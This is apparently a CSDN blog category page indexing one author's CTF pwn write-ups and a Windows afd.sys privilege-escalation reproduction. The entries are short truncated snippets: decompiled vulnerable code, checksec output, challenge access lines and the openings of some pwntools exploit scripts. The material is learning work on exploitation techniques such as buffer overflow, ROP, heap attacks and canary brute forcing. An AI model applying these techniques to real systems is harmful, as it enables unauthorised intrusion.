PWN
文章平均质量分 62
记录PWN的学习经历, CTF-pwn题解, 漏洞复现过程
fa1c4
软件安全研究生, 不定期灌水博主(
展开
-
BUUCTF pwn wp 146 - 150
hitcontraining_playfmtgwctf_2019_easy_pwnbctf2016_bcloudasis2016_b00kswarmup原创 2022-04-30 03:30:00 · 590 阅读 · 0 评论 -
BUUCTF pwn wp 141 - 145
ciscn_2019_n_7qctf_2018_stack2falca@Ubuntu-2000:~/Desktop/qctf_2018_stack2$ file QCTF_2018_stack2;checksec QCTF_2018_stack2QCTF_2018_stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.原创 2022-04-29 03:30:00 · 521 阅读 · 0 评论 -
BUUCTF pwn wp 136 - 140
pwnable_asmpicoctf_2018_echooojarvisoj_level6_x64npuctf_2020_level2[2020 新春红包题]3原创 2022-04-28 03:00:00 · 559 阅读 · 0 评论 -
BUUCTF pwn wp 131 - 135
rootersctf_2019_sropciscn_2019_s_6sctf_2019_easy_heapde1ctf_2019_weaponSWPUCTF_2019_p1KkHeap原创 2022-04-27 03:30:00 · 597 阅读 · 0 评论 -
[DiceCTF 2022] interview-opportunity
interview-opportunityint __cdecl main(int argc, const char **argv, const char **envp){ char buf[10]; // [rsp+6h] [rbp-1Ah] BYREF const char **v5; // [rsp+10h] [rbp-10h] int v6; // [rsp+1Ch] [rbp-4h] v6 = argc; v5 = argv; env_setup(argc, arg原创 2022-04-18 02:15:00 · 591 阅读 · 0 评论 -
BUUCTF pwn wp 126 - 130
gyctf_2020_documentciscn_2019_final_5roarctf_2019_realloc_magichouseoforange_hitcon_2016SWPUCTF_2019_login原创 2022-03-31 00:48:46 · 1739 阅读 · 0 评论 -
Hitcon CTF 2016 - house of orange 做题笔记
前言深入学习pwn的高级堆利用方法, house of orange是绕不开的难关之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞现在避无可避了, 于是准备集中精力突破掉house of orange想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~分析过程CTFhub和BUUCTF的题目有差别, 就按BUU来打吧漏洞利用总结参考...原创 2022-03-31 00:21:52 · 1195 阅读 · 0 评论 -
BUUCTF pwn wp 121 - 125
qctf2018_stack2强网杯2019 拟态 STKOFzctf_2016_note3bcloud_bctf_2016hgame2018_flag_serverhgame2018_flag_server$ file flag_server;checksec flag_serverflag_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically原创 2022-03-24 21:31:18 · 741 阅读 · 0 评论 -
BUUCTF pwn wp 116 - 120
[BSidesCF 2019]Runit[BSidesCF 2019]Runit$ file runit;checksec runit runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4原创 2022-03-06 10:58:00 · 422 阅读 · 0 评论 -
BUUCTF pwn wp 111 - 115
judgement_mna_2016actf_2019_babyheapgyctf_2020_signinwdb_2018_3rd_soEasygyctf_2020_some_thing_interesting原创 2022-03-03 22:28:53 · 403 阅读 · 0 评论 -
BUUCTF pwn wp 106 - 110
picoctf_2018_buffer overflow 0xman_2019_formatciscn_2019_en_3bjdctf_2020_YDSneedGrirlfriendpicoctf_2018_are you root原创 2022-03-03 22:28:43 · 515 阅读 · 0 评论 -
BUUCTF pwn wp 101 - 105
wustctf2020_number_gameciscn_2019_final_2wustctf2020_easyfast做过了https://blog.csdn.net/qq_33976344/article/details/120132888starctf_2019_babyshellwustctf2020_name_your_dog原创 2022-03-03 22:28:26 · 368 阅读 · 0 评论 -
BUUCTF pwn wp 96 - 100
axb_2019_heapaxb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3原创 2022-02-23 21:48:24 · 741 阅读 · 0 评论 -
BUUCTF pwn wp 91 - 95
[ACTF新生赛2020]romeint func(){ int result; // eax int v1[4]; // [esp+14h] [ebp-44h] unsigned __int8 v2; // [esp+24h] [ebp-34h] BYREF unsigned __int8 v3; // [esp+25h] [ebp-33h] unsigned __int8 v4; // [esp+26h] [ebp-32h] unsigned __int8 v5; // [e原创 2022-02-21 15:45:55 · 619 阅读 · 0 评论 -
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
前言这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码.漏洞分析漏洞利用总结...原创 2022-01-26 14:46:42 · 3351 阅读 · 0 评论 -
[Windows]内核调试环境搭建
前言为了探索windows kernel fuzz, 从去年开始先是学了windows逆向基础, 然后花了9个月从零开始大致学了一遍linux pwn的各种漏洞利用技术(windows pwn还没怎么学, 不过原理基本差不多, 需要的技术需要的时候再现学叭), 最近看了一点windows驱动开发的技术栈(虽然也没怎么看懂), 现在可以开始研究研究windows内核的漏洞利用技术了, 同样从零开始, 这篇blog简单介绍windows内核调试环境的搭建.环境搭建如果参考0day书中的环境搭建方法, 过程原创 2022-01-20 14:48:41 · 758 阅读 · 0 评论 -
pwnable.kr wp uaf
题目Mommy, what is Use After Free bug?ssh uaf@pwnable.kr -p2222 (pw:guest)题解#include <fcntl.h>#include <iostream> #include <cstring>#include <cstdlib>#include <unistd.h>using namespace std;class Human{private: vir原创 2022-01-19 14:51:38 · 202 阅读 · 0 评论 -
pwnable.kr wp cmd2
题目Daddy bought me a system command shell.but he put some filters to prevent me from playing with it without his permission...but I wanna play anytime I want!ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)cmd1的flag: mommy now I get what PATH environment原创 2022-01-19 14:51:17 · 251 阅读 · 0 评论 -
pwnable.kr wp cmd1
题目Mommy! what is PATH environment in Linux?ssh cmd1@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>#include <string.h>int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r += strstr(cmd, "tmp")!原创 2022-01-19 14:51:00 · 175 阅读 · 0 评论 -
pwnable.kr wp lotto
题目Mommy! I made a lotto program for my homework.do you want to play?ssh lotto@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>#include <stdlib.h>#include <string.h>#include <fcntl.h>unsigned char submit[6];void play()原创 2022-01-19 14:50:30 · 283 阅读 · 0 评论 -
pwnable.kr wp blackjack
题目Hey! check out this C implementation of blackjack game!I found it online* http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.htmlI like to give my flags to millionares.how much money you got?Running at : nc pwnable.kr 9原创 2022-01-19 14:50:08 · 123 阅读 · 0 评论 -
pwnable.kr wp coin1
题目Mommy, I wanna play a game!(if your network response time is too slow, try nc 0 9007 inside pwnable.kr server)Running at : nc pwnable.kr 9007题解falca@DESKTOP-GKDU8KD:/mnt/c/Windows/System32$ nc pwnable.kr 9007 -----------------------------原创 2022-01-19 14:49:48 · 259 阅读 · 0 评论 -
pwnable.kr wp shellshock
题目Mommy, there was a shocking news about bash.I bet you already know, but lets just make it sure :)ssh shellshock@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(),原创 2022-01-19 14:49:29 · 209 阅读 · 0 评论 -
BUUCTF pwn wp 86 - 90
mrctf2020_shellcode_revenge一道经典题目, 可见字符shellcode. F5失败直接读汇编; Attributes: bp-based frame; int __cdecl main(int argc, const char **argv, const char **envp)public mainmain proc nearbuf= byte ptr -410hvar_8= dword ptr -8var_4= dword ptr -4; __unwi原创 2022-01-17 17:24:24 · 647 阅读 · 0 评论 -
pwnable.kr wp mistake
题目We all make mistakes, let's move on.(don't take this too seriously, no fancy hacking skill is required at all)This task is based on real eventThanks to dhmonkeyhint : operator priorityssh mistake@pwnable.kr -p2222 (pw:guest)题解#include <std原创 2022-01-17 17:22:41 · 190 阅读 · 0 评论 -
pwnable.kr wp leg
题目Daddy told me I should study arm.But I prefer to study my leg!Download : http://pwnable.kr/bin/leg.cDownload : http://pwnable.kr/bin/leg.asmssh leg@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>#include <fcntl.h>int key1(){ asm原创 2022-01-17 17:22:23 · 197 阅读 · 0 评论 -
pwnable.kr wp input
题目Mom? how can I pass my input to a computer program?ssh input2@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/socket.h>#include <arpa/inet.h>int main(int argc,原创 2022-01-17 17:21:23 · 232 阅读 · 0 评论 -
pwnable.kr wp random
题目Daddy, teach me how to use random value in programming!ssh random@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key原创 2022-01-17 17:20:53 · 103 阅读 · 0 评论 -
pwnable.kr wp passcode
题目Mommy told me to make a passcode based login system.My initial C code was compiled without any error!Well, there was some compiler warning, but who cares about that?ssh passcode@pwnable.kr -p2222 (pw:guest)题解#include <stdio.h>#include <原创 2022-01-17 17:20:33 · 235 阅读 · 0 评论 -
pwnable.kr wp flag
题目Papa brought me a packed present! let's open it.Download : http://pwnable.kr/bin/flagThis is reversing task. all you need is binary题解// positive sp value has been detected, the output may be wrong!_BYTE *__fastcall sub_44A560(_BYTE *a1, _BYTE *a原创 2022-01-17 17:19:53 · 276 阅读 · 0 评论 -
pwnable.kr wp bof
题目Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?Download : http://pwnable.kr/bin/bofDownload : http://pwnable.kr/bin/bof.cRunning at : nc pwnable.kr 9000题解#include <stdio.h>#include <st原创 2022-01-17 17:19:31 · 118 阅读 · 0 评论 -
pwnable.kr wp collision
题目Daddy told me about cool MD5 hash collision today.I wanna do something like that too!ssh col@pwnable.kr -p2222 (pw:guest)题解scp -rP2222 col@pwnable.kr:/home/col/* .拷贝文件到本地falca@DESKTOP-GKDU8KD:/mnt/k/PWN/pwnable.kr/collision$ scp -rP2222 col@pwna原创 2022-01-17 17:19:08 · 114 阅读 · 0 评论 -
picoCTF pwn wp - Guessing Game 2
#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#define BUFSIZE 512long get_random() { return rand;}int get_version() { return 2;}int do_stuff() { long ans .原创 2021-06-25 15:33:03 · 417 阅读 · 1 评论 -
BUUCTF pwn wp 16 - 20
[HarekazeCTF2019]baby_ropint __cdecl main(int argc, const char **argv, const char **envp){ char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your name? \""); __isoc99_scanf("%s", v4); printf("Welcome to the Pwn World, %s!\n", v4原创 2021-08-24 16:15:57 · 535 阅读 · 0 评论 -
BUUCTF pwn wp 11 - 15
ciscn_2019_n_8int __cdecl main(int argc, const char **argv, const char **envp){ int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5);原创 2021-08-17 23:09:17 · 452 阅读 · 0 评论 -
pwnable.tw wp - hacknote
前言pwnable.tw上的hacknote, 与攻防世界的hacknote类似的题目分析过程add函数, 还算合理unsigned int add(){ int v0; // ebx int i; // [esp+Ch] [ebp-1Ch] int size; // [esp+10h] [ebp-18h] char buf[8]; // [esp+14h] [ebp-14h] BYREF unsigned int v5; // [esp+1Ch] [ebp-Ch] v原创 2021-09-21 16:02:12 · 228 阅读 · 0 评论 -
NJCTF 2017-messager
先checksec打开了partial RELRO, canary, NX可以自建flag, 打本地echo "flag{Mine}" > flag运行, 然后netstat查看端口port: 5555分析main函数流程是用socket通信, 其中有读取flag到buf的过程sub_400BC6是发送flag, 所以要劫持的进程目的返回地址有了: 0x400BC6利用fork的子进程与父进程同canary特性, 进行canary爆破, 拿到canary后覆盖返回地址劫持流程到s原创 2021-01-26 10:44:16 · 1394 阅读 · 4 评论 -
ADworld pwn wp - Recho
可以任意长度输入, 存在溢出, 不过溢出之后再次输入还是继续执行, 无法退出循环就不能劫持程序流这里用到pwntools的一个函数, 用来结束输入流, 从而结束循环def shutdown(self, direction = "send"): """shutdown(direction = "send") Closes the tube for futher reading or writing depending on `direction`. Ar..原创 2021-06-27 20:33:12 · 173 阅读 · 0 评论 -
BUUCTF pwn wp 56 - 60
others_babystack绕过canary然后栈溢出from pwn import *from LibcSearcher import *url, port = "node4.buuoj.cn", 26959filename = "./babystack"elf = ELF(filename)# libc = ELF("./")context(arch="amd64", os="linux")# context(arch="i386", os="linux")local =原创 2021-10-09 22:38:30 · 269 阅读 · 0 评论 -
ADworld pwn wp - pwn-200
明显的栈溢出, 动态链接, 无libc利用, ret2libc, 板子打法, 用pwntools的DynELF模块泄露libc地址, 原理是结合puts或writes函数泄露地址, 所以有两个利用条件:漏洞可以泄露libc地址漏洞可以反复利用(ret 回到函数开头继续执行)write函数头文件:#include <unistd.h>定义函数:ssize_t write (int fd, const void * buf, size_t count);函数说明:write(...原创 2021-06-25 15:32:13 · 156 阅读 · 1 评论